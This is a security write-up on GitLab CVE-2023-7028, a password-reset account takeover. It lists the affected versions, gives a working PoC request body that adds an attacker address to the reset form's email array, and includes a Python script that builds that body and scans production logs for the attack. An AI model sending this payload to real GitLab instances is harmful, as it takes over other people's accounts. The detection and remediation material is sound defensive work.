# GitLab - CVE-2023-7028

Tracked as CVE-2023-7028, the flaw carries the maximum CVSS score of **10.0** and allows <mark style="color:red;">**account takeover**</mark> without any user interaction: the password reset form accepted the `user[email]` parameter as an array and sent the reset link to every address in it, including an unverified, attacker-controlled one. Only accounts without 2FA can be fully taken over; on a 2FA-protected account the password can still be reset, but the second factor blocks the login. It affects all self-managed GitLab Community Edition (CE) and Enterprise Edition (EE) instances running:

* 16.1 prior to 16.1.6
* 16.2 prior to 16.2.9
* 16.3 prior to 16.3.7
* 16.4 prior to 16.4.5
* 16.5 prior to 16.5.6
* 16.6 prior to 16.6.4
* 16.7 prior to 16.7.2

PoC: send the following body in a `POST` to `/users/password` (the standard reset form; include the form's `authenticity_token` obtained from `GET /users/password/new`). The first address belongs to the victim, the second to the attacker, who receives a valid reset link for the victim's account:

```http
user[email][]=valid@email.com&user[email][]=attacker@email.com
```
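To check whether an instance was targeted, GitLab's advisory points at `gitlab-rails/production_json.log`: look for `POST` requests to `/users/password` whose `params.value.email` is a JSON array holding more than one address (a legitimate reset submits a single string). The script below is an added example, not code from the original page or from GitLab: it builds the PoC body the way the vulnerable Rails controller parsed it, and then runs that log check over constructed sample lines. The host-less path, the victim and attacker addresses, the CSRF token placeholder and the log lines are all constructed for the example.

```python
import json
from urllib.parse import urlencode, parse_qs

# Constructed values for the example; not a real instance or real accounts.
RESET_PATH = "/users/password"
VICTIM = "victim@example.com"
ATTACKER = "attacker@evil.example"


def build_reset_body(victim_email, attacker_email, authenticity_token):
    """Encode the reset form exactly as the PoC does.

    Repeating the key `user[email][]` makes Rails build an array; the
    vulnerable PasswordsController emailed the reset link to every element,
    so the attacker-controlled address received a valid link for the victim.
    The authenticity_token is the CSRF token read from GET /users/password/new.
    """
    fields = [
        ("authenticity_token", authenticity_token),
        ("user[email][]", victim_email),
        ("user[email][]", attacker_email),
    ]
    return urlencode(fields)


def parse_reset_body(body):
    """Server-side view: the list Rails reconstructs from the repeated key."""
    return parse_qs(body).get("user[email][]", [])


def suspicious_reset_requests(log_lines):
    """Scan gitlab-rails/production_json.log lines for the exploit pattern.

    A hit is a POST to /users/password whose `user` param carries an
    `email` array with more than one address. A normal reset submits a
    single string, so any multi-element array deserves investigation.
    Returns (time, remote_ip, emails) tuples.
    """
    hits = []
    for line in log_lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON debris
        if entry.get("method") != "POST" or entry.get("path") != RESET_PATH:
            continue
        for param in entry.get("params", []):
            if param.get("key") != "user" or not isinstance(param.get("value"), dict):
                continue
            emails = param["value"].get("email")
            if isinstance(emails, list) and len(emails) > 1:
                hits.append((entry.get("time"), entry.get("remote_ip"), emails))
    return hits


# Constructed log lines in the shape GitLab's production_json.log uses.
SAMPLE_LOG_LINES = [
    json.dumps({"method": "POST", "path": RESET_PATH, "controller": "PasswordsController",
                "action": "create", "status": 302, "time": "2024-01-12T09:00:00.000Z",
                "remote_ip": "198.51.100.7",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": VICTIM}}]}),
    json.dumps({"method": "POST", "path": RESET_PATH, "controller": "PasswordsController",
                "action": "create", "status": 302, "time": "2024-01-12T09:05:00.000Z",
                "remote_ip": "203.0.113.42",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": [VICTIM, ATTACKER]}}]}),
    json.dumps({"method": "GET", "path": "/users/sign_in", "status": 200,
                "time": "2024-01-12T09:06:00.000Z", "remote_ip": "203.0.113.42", "params": []}),
    "not json",
]


if __name__ == "__main__":
    body = build_reset_body(VICTIM, ATTACKER, "<csrf-token>")
    print("PoC body:", body)
    print("Server sees:", parse_reset_body(body))
    for when, ip, emails in suspicious_reset_requests(SAMPLE_LOG_LINES):
        print(f"SUSPICIOUS {when} from {ip}: reset requested for {emails}")
```

Run it against a real `production_json.log` by reading the file line by line into `suspicious_reset_requests`; a hit means someone requested a reset link for the listed addresses from the recorded IP, so rotate that account's password, tokens and keys and review its recent activity. The `audit_json.log` entries with `meta.caller.id` of `PasswordsController#create` carry the same array in `target_details` and can be checked the same way.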
